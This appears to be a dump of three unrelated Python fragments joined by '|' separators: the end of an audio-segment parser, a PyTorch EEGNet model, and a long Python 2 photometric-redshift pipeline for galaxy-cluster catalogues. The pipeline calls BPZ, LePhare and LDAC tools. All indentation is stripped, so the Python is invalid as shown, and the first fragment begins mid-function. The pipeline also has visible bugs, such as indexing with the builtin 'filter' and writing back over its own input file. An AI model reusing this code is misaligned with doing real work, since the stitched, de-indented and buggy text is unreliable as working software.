cols = ["start", "end", "key"]
res = list(df[cols].to_records(index=False))
return res
def get_txt_segs(seg_file, sample_rate, base_name, add_labels, sep, ts_units):
res = []
with open(seg_file, "r") as f:
for i, line in enumerate(f):
start, end, label = line.strip().split(sep)
start = units_to_sample(start, ts_units, sample_rate)
end = units_to_sample(end, ts_units, sample_rate)
key = "%s-%i-%s-%s" % (base_name, i, str(start), str(end))
if add_labels:
res.append((start, end, key, label))
else:
res.append((start, end, key))
return res
|
# -*- coding: utf-8 -*-
"""EEGNet: Compact Convolutional Neural Network (Compact-CNN) https://arxiv.org/pdf/1803.04566.pdf
"""
import torch
from torch import nn
from .common.conv import SeparableConv2d
class CompactEEGNet(nn.Module):
"""
EEGNet: Compact Convolutional Neural Network (Compact-CNN)
https://arxiv.org/pdf/1803.04566.pdf
"""
def __init__(self, num_channel=10, num_classes=4, signal_length=1000, f1=96, f2=96, d=1):
super().__init__()
self.signal_length = signal_length
# layer 1
self.conv1 = nn.Conv2d(1, f1, (1, signal_length), padding=(0,signal_length//2))
self.bn1 = nn.BatchNorm2d(f1)
self.depthwise_conv = nn.Conv2d(f1, d*f1, (num_channel, 1), groups=f1)
self.bn2 = nn.BatchNorm2d(d*f1)
self.avgpool1 = nn.AvgPool2d((1,4))
# layer 2
self.separable_conv = SeparableConv2d(
in_channels=f1,
out_channels=f2,
kernel_size=(1,16)
)
self.bn3 = nn.BatchNorm2d(f2)
self.avgpool2 = nn.AvgPool2d((1,8))
# layer 3
self.linear = nn.Linear(in_features=f2*(signal_length//32), out_features=num_classes)
self.dropout = nn.Dropout(p=0.5)
self.elu = nn.ELU()
def forward(self, x):
# layer 1
x = torch.unsqueeze(x,1)
x = self.conv1(x)
x = self.bn1(x)
x = self.depthwise_conv(x)
x = self.bn2(x)
x = self.elu(x)
x = self.avgpool1(x)
x = self.dropout(x)
# layer 2
x = self.separable_conv(x)
x = self.bn3(x)
x = self.elu(x)
x = self.avgpool2(x)
x = self.dropout(x)
# layer 3
x = torch.flatten(x, start_dim=1)
x = self.linear(x)
return x
|
#!/usr/bin/env python
def parse_column_file(input,output=None,offsets=None):
f = open(input,'r').readlines()
dict = {}
for l in f:
import re
res = re .split('\s+',l)
print res
if len(res) > 3:
t = {}
t['cols'] = res[1]
t['offset'] = float(res[4])
dict[res[0]] = t
else:
dict[res[0]] = {'cols':res[1]}
if offsets:
for key in dict:
if key in offsets:
dict[key]['offset'] += offsets[key]
if not output: output = input + '.new'
o = open(input,'w')
for key in dict:
if 'offset' in dict[key]:
o.write(key + '\t' + dict[key]['cols'] + '\tAB\t0.02\t' + str(dict[key]['offset']) + '\n')
else:
o.write(key + '\t' + dict[key]['cols'] + '\n')
o.close()
def fit_zps(dictionary):
dictionary['INTERP'] = 0
command = 'python %(BPZPATH)s/bpz.py %(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all_bpz%(magtype)s%(SPECTRA)s%(iaper)s_%(n)s.cat \
-COLUMNS %(columns)s \
-MAG %(magvar)s \
-SPECTRA %(SPECTRA)s \
-PRIOR hdfn_SB \
-CHECK yes \
-PLOTS yes \
-VERBOSE yes \
-ZMAX 4.0 \
-PLOTS yes \
-INTERP %(INTERP)s \
-INTERACTIVE yes \
-ONLY_TYPE yes \
-OUTPUT %(catalog)s' % dictionary
print ' command=',command
import commands
for i in range(1):
import os
os.system('cat ' + dictionary['columns'])
print 'running'
f = commands.getoutput(command).split('\n')
print ' f=',f
go = False
index = 0
import string
offsets = {}
for i in range(len(f)):
print f[i]
if string.find(f[i],'Average') != -1:
import re
filts = re.split('\s+',f[i+1])[1:]
deltas = [float(x) for x in re.split('\s+',f[i+4])[1:-1]]
offsets = dict(zip(filts,deltas))
break
print ' offsets=',offsets
print dictionary['columns']
parse_column_file(dictionary['columns'],offsets=offsets)
#raw_input('finished fit_zps')
def convert_to_mags(run_name,mag_cat,outputfile):
import astropy, astropy.io.fits as pyfits
mag = pyfits.open(mag_cat)[1]
cat = run_name + '.bpz'
#adam-tmp# from useful import *
from coeio import loaddata, loadfile, params_cl, str2num, loaddict, findmatch1, pause #, prange, plotconfig
bpzstr = loadfile(cat)
bpzparams = {}
i = 0
import string
while bpzstr[i][:2] == '##':
line = bpzstr[i][2:]
if '=' in line:
[key, value] = string.split(line, '=')
bpzparams[key] = value
i = i + 1
print bpzparams['FLUX_COMPARISON']
columns = bpzparams.get('COLUMNS', run_name+'.columns')
flux_comparison = run_name + '.flux_comparison' #bpzparams.get('FLUX_COMPARISON', run_name+'.flux_comparison')
zs=get_2Darray(cat) #Read the whole file
print zs
all=get_2Darray(flux_comparison) #Read the whole file
ncols=len(all[0,:])
nf=(ncols-5)/3
filters=get_str(columns,0,nf)
print filters
import numpy
#t = numpy.loadtxt(inputcat)
#all=get_2Darray(inputcat) #Read the whole file
print len(all[:,0])
ncols=len(all[0,:])
print len(all[0,:] )
nf=(ncols-5)/3
''' need to get the number of filters '''
''' need to retrieve the flux predicted, flux observed, and flux_error '''
import scipy
ID=scipy.array(all[:,0]) # FLUX (from spectrum for that TYPE)
ft=scipy.array(all[:,5:5+nf]) # FLUX (from spectrum for that TYPE)
fo=scipy.array(all[:,5+nf:5+2*nf]) # FLUX (OBSERVED)
efo=scipy.array(all[:,5+2*nf:5+3*nf]) # FLUX_ERROR (OBSERVED)
all_num = len(ft)
print all_num
import math as m
print -2.5*scipy.log10(ft)
import astropy, astropy.io.fits as pyfits, numpy
tables = {}
i = 0
cols = []
''' if column not already there, then add it '''
cols.append(pyfits.Column(name='SeqNr', format = 'J', array = ID))
cols.append(pyfits.Column(name='NFILT', format = 'J', array = mag.data.field('NFILT')))
for i in range(len(filters)):
print filters[i], i, ft[:,i]
added = False
for column in mag.columns:
if 'MAG_APER-' + filters[i] == column.name:
measured = mag.data.field('MAG_APER-'+filters[i])
if len(measured[measured!=-99]) > 0:
''' subsitute where there are -99 values '''
measured[measured==-99] = -2.5*scipy.log10(ft[:,i])
cols.append(pyfits.Column(name='HYBRID_MAG_APER-' + filters[i], format = '1E', array = measured))
added = True
print 'measured', filters[i]
break
if not added:
cols.append(pyfits.Column(name='HYBRID_MAG_APER-'+filters[i], format = '1E', array = -2.5*scipy.log10(ft[:,i])))
#cols.append(pyfits.Column(name='MAGERR_APER-'+filters[i], format = '1E', array = 99.*numpy.ones(2)))
import scipy
for column in mag.columns:
if string.find(column.name,'MAG') == -1:
a = -2.5*scipy.log10(mag.data.field(column.name))
a[mag.data.field(column.name) == 0] = -99
cols.append(pyfits.Column(name='DATA_' + column.name.replace('FLUX','MAG'), format = column.format, array = a))
else:
a = mag.data.field(column.name)
cols.append(pyfits.Column(name='DATA_' + column.name, format = column.format, array = a))
print cols
print len(cols)
hdu = pyfits.PrimaryHDU()
hduSTDTAB = pyfits.BinTableHDU.from_columns(cols)
hdulist = pyfits.HDUList([hdu])
hdulist.append(hduSTDTAB)
hdulist[1].header['EXTNAME']='OBJECTS'
import os
os.system('rm ' + outputfile)
print outputfile
hdulist.writeto(outputfile)
def add_dummy_ifilter(catalog, outputfile):
import astropy, astropy.io.fits as pyfits, numpy
i = 0
cols = []
tables = pyfits.open(catalog)['OBJECTS']
for col in ['SeqNr']:
cols.append(pyfits.Column(name=col, format = 'J', array = tables.data.field(col)))
already_there = False
for column in tables.columns:
cols.append(column)
if column.name == 'FLUX_APER1-SUBARU-10_2-1-W-S-I+':
already_there = True
''' if column not already there, then add it STILL NEED TO IMPLEMENT !!! '''
rows = len(pyfits.open(catalog)['OBJECTS'].data)
if not already_there:
cols.append(pyfits.Column(name='FLUX_APER0-SUBARU-10_2-1-W-S-I+', format = '1E', array = numpy.zeros(rows)))
cols.append(pyfits.Column(name='FLUXERR_APER0-SUBARU-10_2-1-W-S-I+', format = '1E', array = numpy.zeros(rows)))
cols.append(pyfits.Column(name='FLUX_APER1-SUBARU-10_2-1-W-S-I+', format = '1E', array = numpy.zeros(rows)))
cols.append(pyfits.Column(name='FLUXERR_APER1-SUBARU-10_2-1-W-S-I+', format = '1E', array = numpy.zeros(rows)))
cols.append(pyfits.Column(name='MAG_APER0-SUBARU-10_2-1-W-S-I+', format = '1E', array = numpy.zeros(rows)))
cols.append(pyfits.Column(name='MAGERR_APER0-SUBARU-10_2-1-W-S-I+', format = '1E', array = numpy.zeros(rows)))
cols.append(pyfits.Column(name='MAG_APER1-SUBARU-10_2-1-W-S-I+', format = '1E', array = numpy.zeros(rows)))
cols.append(pyfits.Column(name='MAGERR_APER1-SUBARU-10_2-1-W-S-I+', format = '1E', array = numpy.zeros(rows)))
print ' cols=',cols
print ' len(cols)=',len(cols)
hdu = pyfits.PrimaryHDU()
hduSTDTAB = pyfits.BinTableHDU.from_columns(cols)
hdulist = pyfits.HDUList([hdu])
hdulist.append(hduSTDTAB)
hdulist[1].header['EXTNAME']='OBJECTS'
import os
os.system('rm ' + outputfile)
print ' outputfile=',outputfile
hdulist.writeto(outputfile)
def add_dummy_filters(catalog, outputfile):
add_filters =['MEGAPRIME-0-1-g','MEGAPRIME-0-1-r','MEGAPRIME-0-1-i','MEGAPRIME-0-1-z','SUBARU-10_2-1-W-S-G+','SUBARU-10_2-1-W-C-RC','SUBARU-10_2-1-W-C-IC']
use_filters = ['MEGAPRIME-0-1-u','SUBARU-10_2-1-W-J-B','SUBARU-10_2-1-W-J-V','SUBARU-10_2-1-W-S-R+','SUBARU-10_2-1-W-S-I+','SUBARU-10_2-1-W-S-Z+']
import astropy, astropy.io.fits as pyfits, numpy
i = 0
cols = []
tables = pyfits.open(catalog)['OBJECTS']
for col in ['SeqNr','B_mask','V_mask','i_mask','z_mask']:
cols.append(pyfits.Column(name=col, format = 'J', array = tables.data.field(col)))
for filt in use_filters: # tables[str(i)]['OBJECTS'].columns:
cols.append(pyfits.Column(name='MAG_APER-'+filt, format = '1E', array = tables.data.field('MAG_APER-'+filt)))
cols.append(pyfits.Column(name='MAGERR_APER-'+filt, format = '1E', array = tables.data.field('MAGERR_APER-'+filt)))
''' if column not already there, then add it STILL NEED TO IMPLEMENT !!! '''
rows = len(pyfits.open(catalog)['OBJECTS'].data)
for filt in add_filters:
cols.append(pyfits.Column(name='MAG_APER-'+filt, format = '1E', array = -99.*numpy.ones(rows)))
cols.append(pyfits.Column(name='MAGERR_APER-'+filt, format = '1E', array = 99.*numpy.ones(rows)))
print ' cols=',cols
print ' len(cols)=',len(cols)
hdu = pyfits.PrimaryHDU()
hduSTDTAB = pyfits.BinTableHDU.from_columns(cols)
hdulist = pyfits.HDUList([hdu])
hdulist.append(hduSTDTAB)
hdulist[1].header['EXTNAME']='OBJECTS'
import os
os.system('rm ' + outputfile)
print ' outputfile=',outputfile
hdulist.writeto(outputfile)
def mkplot(file,name):
import MySQLdb
import os, sys, anydbm, time
import lib, scipy, pylab
from scipy import arange
file = open(file,'r').readlines()
results = []
for line in file:
if line[0] != '#':
import re
res = re.split('\s+',line)
#for i in range(len(res)):
# print res[i],i
results.append([float(res[2]),float(res[23]),res[1]])
diff = []
z = []
z_spec = []
zbs = {'0,0.2':[],'0.2,0.4':[],'0.4,0.6':[],'0.6,0.8':[]}
for line in results:
diff_val = (line[0] - line[1])/(1 + line[1])
diff.append(diff_val)
z.append(line[0])
z_spec.append(line[1])
for zb in zbs.keys():
import re
min,max = re.split('\,',zb)
if float(min) <= float(line[1]) < float(max):
zbs[zb].append(diff_val)
for zb in zbs.keys():
import scipy
print ' zb=',zb , ' scipy.median(scipy.array(zbs[zb]))=',scipy.median(scipy.array(zbs[zb]))
ys = []
for y in zbs[zb]:
if abs(y) < 0.1:
ys.append(y)
print ' scipy.mean(scipy.array(ys))=',scipy.mean(scipy.array(ys))
list = diff[:]
import pylab
varps = []
a, b, varp = pylab.hist(diff,bins=arange(-0.2,0.2,0.016))
#print a,b,varp
varps.append(varp[0])
diff_cut = []
for d in range(len(diff)):
if abs(d) < 0.25:
diff_cut.append(diff[d])
list = scipy.array(diff_cut)
mu = list.mean()
median = scipy.median(diff_cut)
sigma = list.std()
print 'mu', mu
print 'sigma', sigma
sigma = 0.06
print ' len(z)=',len(z) , ' len(diff)=',len(diff)
reject = []
for line in results:
diff_val = (line[0] - line[1] - median)/(1 + line[1])
if abs(diff_val)>3*sigma: reject.append(line[2])
print reject
from scipy import stats
fit_a, fit_b, fit_varp = pylab.hist(diff_cut,bins=arange(-0.2,0.2,0.016))
pdf = scipy.stats.norm.pdf(fit_b, mu, sigma)
print 'pdf', pdf
height = scipy.array(a).max()
print pdf
pylab.plot(fit_b,len(diff_cut)*pdf/pdf.sum(),'r')
pylab.xlabel("(PhotZ - SpecZ)/(1 + SpecZ)")
pylab.ylabel("Number of Galaxies")
pylab.show()
pylab.savefig(name + 'RedshiftErrors.ps')
pylab.clf()
import scipy, numpy
from scipy import optimize
A = numpy.hstack((scipy.array(z)[:,numpy.newaxis],numpy.ones(len(z))[:,numpy.newaxis]))
#print A
#print scipy.shape(A)
#print scipy.shape(scipy.array(diff))
#(m,b), resids, rank, s = scipy.linalg.basic.lstsq(A,scipy.array(diff))
#pylab.plot(z,m*z+b,label='best-fit')
pylab.scatter(z_spec,z)
pylab.plot(scipy.array([0,1]),scipy.array([0,1]),color='red')
pylab.xlim(0,1)
pylab.ylim(0,1)
#pylab.ylabel("(PhotZ - SpecZ)/(1 + SpecZ)")
pylab.xlabel("PhotZ")
pylab.show()
pylab.savefig(name + 'RedshiftScatter.ps')
pylab.clf()
return reject
def get_cluster_z(file):
import ldac, numpy
f = ldac.openObjectFile(file)
arr = numpy.zeros(151)
for iz in f['Z']:
#print iz
n=int(iz*100.)
if n>150:
n=150
if n < 0:
n=0
#print "filling ",n
arr[n]= arr[n]+1
max = 0
maxind=0
for i in range(151):
#print max , maxind,arr[i]
if arr[i]>max:
max=arr[i]
maxind=i
Z = float(maxind)/100.
print Z
return Z
def join_cats(cs,outputfile):
import astropy, astropy.io.fits as pyfits
tables = {}
i = 0
cols = []
seqnr = 0
for c in cs:
if len(c) == 2:
TAB = c[1]
c = c[0]
else: TAB = 'STDTAB'
i += 1
print c
tables[str(i)] = pyfits.open(c)
for column in tables[str(i)][TAB].columns:
if column.name == 'SeqNr':
if not seqnr:
seqnr += 1
else:
column.name = column.name + '_' + str(seqnr)
seqnr += 1
cols.append(column)
print cols
print len(cols)
hdu = pyfits.PrimaryHDU()
hduSTDTAB = pyfits.BinTableHDU.from_columns(cols)
hdulist = pyfits.HDUList([hdu])
hdulist.append(hduSTDTAB)
hdulist[1].header['EXTNAME']='STDTAB'
import os
os.system('rm ' + outputfile)
print outputfile
hdulist.writeto(outputfile)
def parse(file,filters,constantFilter, columns,cluster):
import re
#filters = re.split('\,',filters[:-1])
filter_off = {}
filter_off_wild = {}
if True:
print file
f = open(file).readlines()
import string
for line in f:
if string.find(line,'SHIFTS') != -1:
shifts = line
res = re.split('\s+',shifts.replace(',',''))[2:-1]
shifts_v = res
break
print res
for i in range(len(filters)):
filter_off[filters[i]] = res[i]
filter_off_wild[filters[i].replace('-1-','%').replace('-2-','%').replace('-3-','%')] = res[i]
res_fix = []
''' now apply same offsets to chips from the same filter '''
for i in range(len(filters)):
zo = float(res[i])
if zo == 0:
zo = filter_off_wild[filters[i].replace('-1-','%').replace('-2-','%').replace('-3-','%')]
print zo
res_fix.append(str(zo))
print res_fix
print filter_off
import photometry_db
photometry_db.initConnection()
''' save to database '''
for filt in filters:
''' now loop over apertures '''
print cluster, filt, float(filter_off[filter])
slrZP = photometry_db.registerLePhareZP(cluster, filt, constantFilter, float(filter_off[filter]))
import string
#print shifts, res
print columns
raw = open(columns,'r').readlines()
i = -1
filen = columns.replace('.replace','')
out = open(filen,'w')
for line in raw:
if string.find(line,'AB')!=-1:
i += 1
if i < len(res):
''' sign on shifts is opposite !!! '''
#line = line.replace('REPLACE',str(-1.*float(res[i])))
line = line.replace('REPLACE',str(0))
line = line.replace('\n','')
if len(line) > 0:
out.write(line + '\n')
out.close()
return res_fix
#shifts_v = res = ['0.66','0','0','-0.095','0.228','0.23','0','0','0.36','-0.15','0.002','0.244373']
def apply_shifts(file, filters, columns ):
shifts_v = res = ['0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','0'][0:len(filters)]
import string
#print shifts, res
print columns
raw = open(columns,'r').readlines()
i = -1
filen = columns.replace('.replace','')
out = open(filen,'w')
for line in raw:
if string.find(line,'AB')!=-1:
i += 1
if i < len(res):
line = line.replace('REPLACE',res[i])
line = line.replace('\n','')
if len(line) > 0:
out.write(line + '\n')
out.close()
return shifts_v
def parseeazy(catalog,n):
from utilities import run
import os
f = open(catalog,'r').readlines()
sntmp = open('sntmp','w')
key_start = False
keys = []
for line in f:
import string
if line[0:2] == '# ':
import re
res2 = re.split('\s+',line[:-1])
print res2
for k in res2[1:]:
keys.append('EAZY_' + k)
break
if line[0] != '#':
break
print keys
tempconf = '/tmp/' + os.environ['USER'] + 'photoz.conf'
conflist = open(tempconf,'w')
for key in keys:
if key == 'EAZY_id' :
conflist.write('COL_NAME = SeqNr\nCOL_TTYPE = LONG\nCOL_HTYPE = INT\nCOL_COMM = ""\nCOL_UNIT = ""\nCOL_DEPTH = 1\n#\n')
else:
conflist.write('COL_NAME = ' + key + '\nCOL_TTYPE = DOUBLE\nCOL_HTYPE = FLOAT\nCOL_COMM = ""\nCOL_UNIT = ""\nCOL_DEPTH = 1\n#\n')
conflist.close()
import os
tempcat = '/tmp/' + os.environ['USER'] + 'zs.cat'
run('asctoldac -i ' + catalog + ' -o ' + catalog + '.temp.tab' + ' -c ' + tempconf + ' -t STDTAB',[tempcat] )
command = 'ldacaddkey -i ' + catalog + '.temp.tab -o ' + catalog + '.tab -t STDTAB -k EAZY_NUMBER ' + str(n) + ' FLOAT "" '
print command
os.system(command)
print catalog + '.tab'
def parsebpz(catalog,n):
import os
from utilities import run
f = open(catalog,'r').readlines()
sntmp = open(os.environ['USER'] + 'sntmp','w')
key_start = False
keys = []
for line in f:
import string
if line[0:2] == '# ':
import re
res2 = re.split('\s+',line[:-1])
print res2
keys.append('BPZ_' + res2[2])
if line[0] != '#':
break
tempconf = '/tmp/' + os.environ['USER'] + 'photoz.conf'
conflist = open(tempconf,'w')
for key in keys:
if key == 'BPZ_ID' :
conflist.write('COL_NAME = SeqNr\nCOL_TTYPE = LONG\nCOL_HTYPE = INT\nCOL_COMM = ""\nCOL_UNIT = ""\nCOL_DEPTH = 1\n#\n')
else:
conflist.write('COL_NAME = ' + key + '\nCOL_TTYPE = DOUBLE\nCOL_HTYPE = FLOAT\nCOL_COMM = ""\nCOL_UNIT = ""\nCOL_DEPTH = 1\n#\n')
conflist.close()
import os
tempcat = '/tmp/' + os.environ['USER'] + 'zs.cat'
run('asctoldac -i ' + catalog + ' -o ' + catalog + '.temp.tab' + ' -c ' + tempconf + ' -t STDTAB',[tempcat] )
command = 'ldacaddkey -i ' + catalog + '.temp.tab -o ' + catalog + '.tab -t STDTAB -k BPZ_NUMBER ' + str(n) + ' FLOAT "" '
print command
os.system(command)
print catalog + '.tab'
print 'here'
def parselph(catalog):
from utilities import run
f = open(catalog,'r').readlines()
sntmp = open(os.environ['USER'] + 'sntmp','w')
key_start = False
keys = []
for line in f:
import string
if key_start:
import re
res = re.split(',',line[1:])
for r in res:
res2 = re.split('\s+',r)
if len(res2) > 2:
keys.append('LPH_' + res2[1])
if string.find(line,'Output format') != -1:
key_start = True
if string.find(line,'########') != -1 and key_start == True:
key_start = False
break
tempconf = '/tmp/' + os.environ['USER'] + 'photoz.conf'
conflist = open(tempconf,'w')
for key in keys:
if key == 'ID' :
conflist.write('COL_NAME = SeqNr\nCOL_TTYPE = LONG\nCOL_HTYPE = INT\nCOL_COMM = ""\nCOL_UNIT = ""\nCOL_DEPTH = 1\n#\n')
else:
conflist.write('COL_NAME = ' + key + '\nCOL_TTYPE = DOUBLE\nCOL_HTYPE = FLOAT\nCOL_COMM = ""\nCOL_UNIT = ""\nCOL_DEPTH = 1\n#\n')
conflist.close()
import os
tempcat = '/tmp/' + os.environ['USER'] + 'zs.cat'
run('asctoldac -i ' + catalog + ' -o ' + catalog + '.tab' + ' -c ' + tempconf + ' -t STDTAB',[tempcat] )
print catalog + '.tab'
#input = reduce(lambda x,y: x + ' ' + y, keys)
#run('ldacjoinkey -t OBJECTS -i /tmp/' + cluster + 'output.cat -p ' + tempcat + ' -o /tmp/' + cluster + 'final.cat -t STDTAB -k ' + input)
def get_filters(cat,tab='STDTAB',SPECTRA=None):
import astropy, astropy.io.fits as pyfits, string
dict = {}
p = pyfits.open(cat)
#print p[tab].columns
for column in p[tab].columns:
import re
res = re.split('-',column.name)
#if len(res) > 1 and (string.find(column.name,'SUBARU') != -1 or string.find(column.name,'MEGA')!=-1 or string.find(column.name,'WIR')!=-1) and string.find(column.name,'1-u') == -1 and string.find(column.name,'SUBARU-9') == -1:
''' 1423 u-band image is bad '''
use = False
if len(res) > 1 and string.find(column.name,'W-J-U') == -1 and string.find(column.name,'FWHM')==-1 and string.find(column.name,'COADD')==-1 and string.find(column.name,'MAG')!=-1 and string.find(column.name,'--')==-1:
if SPECTRA == 'CWWSB_capak_ubvriz.list':
use = len(filter(lambda x:x,[string.find(column.name,f)!=-1 for f in ['-u','W-J-B','W-J-V','W-C-RC','W-C-IC','W-S-Z+']]))
elif SPECTRA == 'CWWSB_capak_u.list':
use = len(filter(lambda x:x,[string.find(column.name,f)!=-1 for f in ['W-J-B','W-J-V','W-C-RC','W-C-IC','W-S-Z+']]))
elif SPECTRA == 'CWWSB_capak_ub.list':
use = len(filter(lambda x:x,[string.find(column.name,f)!=-1 for f in ['W-J-V','W-C-RC','W-S-I+','W-C-IC','W-S-Z+']]))
elif SPECTRA == 'CWWSB_capak_uz.list':
use = len(filter(lambda x:x,[string.find(column.name,f)!=-1 for f in ['W-J-B','W-J-V','W-C-RC','W-C-IC']]))
else:
use = True
if string.find(column.name,'SUBARU') != -1 and (string.find(column.name,'10') == -1 and string.find(column.name,'9') == -1) and string.find(column.name,'8')==-1:
use = False
if string.find(column.name,'MEGAPRIME') != -1 and (string.find(column.name,'1') == -1 and string.find(column.name,'0') == -1):
use = False
if string.find(cat,'A370') != -1 and (string.find(column.name,'W-S-I+') != -1 or string.find(column.name,'8') != -1):
use = False
if string.find(cat, 'HDFN') != -1 and (string.find(column.name,'SUBARU-9') != -1 or string.find(column.name,'W-S-I+')!= -1 or string.find(column.name,'-2-') != -1): # or string.find(column.name,'u') != -1):
use = False
#if string.find(cat,'HDFN') != -1 and (string.find(column.name,'W-S-Z+') != -1):
# use = False
if string.find(cat,'A383') != -1 and (string.find(column.name,'u') != -1): # or string.find(column.name,'W-J-V') != -1):
use = False
#string.find(column.name,'SUBARU-9') != -1 or
''' remove WHT data, and u-band data '''
if string.find(column.name,'WH') != -1 or string.find(column.name,'u') != -1 or string.find(column.name,'-U') != -1: # or string.find(column.name,'B') != -1: # or (string.find(column.name,'B') != -1 and string.find(column.name,'9') != -1): # is False:
use = False
#if string.find(column.name,'W-S-I+') != -1: # or string.find(column.name,'B') != -1: # or (string.find(column.name,'B') != -1 and string.find(column.name,'9') != -1): # is False:
# use = False
if False: #string.find(cat,'HDFN') != -1 and (string.find(column.name,'W-J-B') != -1 and string.find(column.name,'9') != -1):
use = False
#if string.find(cat,'HDFN') != -1 and string.find(column.name,'W-S-Z') != -1:
# use = False
''' throw out early data '''
#if string.find(column.name,'SUBARU') != -1 and (string.find(column.name,'9') != -1 or string.find(column.name,'8')!=-1):
# use = False
# and string.find(column.name,'1-u') == -1: # and string.find(column.name,'W-J-B') == -1 : #or string.find(column.name,'MEGA')!=-1 or string.find(column.name,'WIR')!=-1): # and string.find(column.name,'1-u') == -1: # and string.find(column.name,'SUBARU-9') == -1: # and string.find(column.name,'10_1') == -1: #
# and string.find(column.name,'1-u') == -1
if use:
try:
dummy = int(res[-1])
except:
filt = reduce(lambda x,y: x+'-'+y,res[1:])
dict[filt] = 'yes'
if False: #string.find(filt,'WHT') != -1:
print column.name, res, filt
#print res, filter, column
filters = dict.keys()
print 'filters=',filters
return filters
def figure_out_slr_chip(filters,catalog,tab='STDTAB',magtype='APER1'):
#magtype='APER1'
print magtype, 'magtype'
import astropy, astropy.io.fits as pyfits, string
print catalog
table = pyfits.open(catalog)[tab].data
stdfilts = {}
good_star_nums = {}
for filt in filters:
a = table.field('MAG_' + magtype + '-' + filt)
b = a[a!=-99]
print filt, len(a), len(b)
import utilities
stdfilt = utilities.parseFilter(filt)[-1]
''' USE LATE 10_1 or 10_2 data if possible '''
if string.find(filt,'-2-') == -1 and (string.find(filt,'10_2') != -1 or string.find(filt,'10_1') != -1):
stat = 9999999999
else:
stat = len(b)
if not stdfilt in stdfilts:
stdfilts[stdfilt] = [[stat, filt]]
else:
stdfilts[stdfilt] += [[stat, filt]]
good_star_nums[filt] = len(b)
print stdfilts
moststarfilts = {}
for key in stdfilts:
usefilt = sorted(stdfilts[key],reverse=True)[0][1]
moststarfilts[key] = usefilt
print moststarfilts
return moststarfilts, good_star_nums
def do_it(CLUSTER,DETECT_FILTER,AP_TYPE,filters,inputcat, calib_type,spec,use_spec,SPECTRA,picks=None,magtype='ISO',randsample=False,short=False,randpercent=0.03,magflux='FLUX',ID='SeqNr',only_type=False):
import os
go = True
LEPHAREDIR='/nfs/slac/g/ki/ki04/pkelly/lephare_dev/'
LEPHAREWORK='/nfs/slac/g/ki/ki04/pkelly/lepharework/'
#adam-old# SUBARUDIR='/nfs/slac/g/ki/ki05/anja/SUBARU'
SUBARUDIR=os.environ['SUBARUDIR']
iaper = '1'
dict = {'LEPHAREDIR':LEPHAREDIR,
'SUBARUDIR':SUBARUDIR,
'PHOTOMETRYDIR': 'PHOTOMETRY_' + DETECT_FILTER + AP_TYPE,
'AP_TYPE': AP_TYPE,
'CLUSTER':CLUSTER,
'BPZPATH':os.environ['BPZPATH'],
'iaper':iaper,
'calib_type':calib_type,
'magtype':magtype,
}
if len(filters) > 4: dict['INTERP'] = '8'
else: dict['INTERP'] = '0'
final_cats = []
dict['SPECTRA'] = SPECTRA #'CWWSB_capak.list' # use Peter Capak's SEDs
#dict['SPECTRA'] = 'CWWSB4.list'
#dict['SPECTRA'] = 'CFHTLS_MOD.list'
for type in ['bpz']:
dict['type'] = type
dict['incat_lph'] = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all.%(magtype)s%(SPECTRA)s.cat.lph%(iaper)s.tab' % dict
dict['incat_bpz'] = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all.%(magtype)s%(SPECTRA)s.cat.bpz%(iaper)s.tab' % dict
#print dict['incat_bpz']
#print ID
dict['incat_eazy'] = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all.%(magtype)s%(SPECTRA)s.cat.eazy%(iaper)s' % dict
dict['header_eazy'] = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all.%(magtype)s%(SPECTRA)s.cat.eazyheader' % dict
dict['incat_prior'] = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/all.%(magtype)s%(SPECTRA)s.cat.prior%(iaper)s.tab' % dict
#filters = get_filters(dict['incat_' + dict['type']])
''' make configuration file '''
dummy_config = '%(LEPHAREDIR)s/config/dummy_config.para' % dict
t = open(dummy_config).read()
config = '%(LEPHAREDIR)s/config/%(CLUSTER)sconfig.para' % dict
dict.update({'config':config})
import string
fstring = ''
quadadd = ''
i = 1
goodl = []
for z in filters:
#if string.find(z,'MEGA')!=-1:
# f = 'cfht/megacam/' + z + '.pb'
#elif string.find(z,'SUBARU')!=-1:
print z
if True: #(string.find(z,'10_2-1') != -1 or string.find(z,'10_1-1') != -1) and string.find(z,'SUBARU')!=-1:
goodl.append(i)
i += 1
print goodl
if True:
f = '' + z + '.res'
from glob import glob
print glob(os.environ['BPZPATH'] + '/FILTER/' + f)
print os.environ['BPZPATH'] + '/FILTER/' + f
if len(glob(os.environ['BPZPATH'] + '/FILTER/' + f)) > 0:
fstring += f + ','
quadadd += '0.00,'
else:
print 'couldnt find filter!!!'
raise Exception
if len(goodl) > 1:
ref = str(goodl[0]) + ',' + str(goodl[1]) + ',' + str(goodl[0])
else: ref = '1,3,1'
dict['ref'] = ref
import re
constantFilter = reduce(lambda x,y: str(x) + ',' + str(y), [filters[i] for i in [int(z) for z in re.split('\,',ref)]])
print constantFilter
dict['mag_ref'] = str(goodl[0])
fstring = fstring[:-1]
quadadd = quadadd[:-1]
print fstring
dict['quadadd'] = str(quadadd)
print quadadd
dict['fstring'] = fstring
if False:
c = open(config,'w')
c.write('FILTER_LIST ' + fstring + '\n' + t.replace('cluster',dict['CLUSTER']))
#c.write('FILTER_LIST ' + fstring + '\n' + t.replace('cluster',dict['CLUSTER']))
c.close()
print config
if False: # go:
os.system(os.environ['LEPHAREDIR'] + '/source/filter -c ' + config)
os.system(os.environ['LEPHAREDIR'] + '/source/sedtolib -t G -c ' + config)
os.system(os.environ['LEPHAREDIR'] + '/source/sedtolib -t S -c ' + config)
os.system(os.environ['LEPHAREDIR'] + '/source/mag_star -c ' + config)
os.system(os.environ['LEPHAREDIR'] + '/source/mag_gal -t G -c ' + config)
go = False
''' retrieve zeropoint shifts '''
columns = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/spec.cat.columns.replace' % dict
file = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)s.%(iaper)s.spec.zs' % dict
print spec
if spec:
''' filter out cluster galaxies '''
spec_cat = '%(SUBARUDIR)s/%(CLUSTER)s/%(PHOTOMETRYDIR)s/%(CLUSTER)sspec.cat' % dict
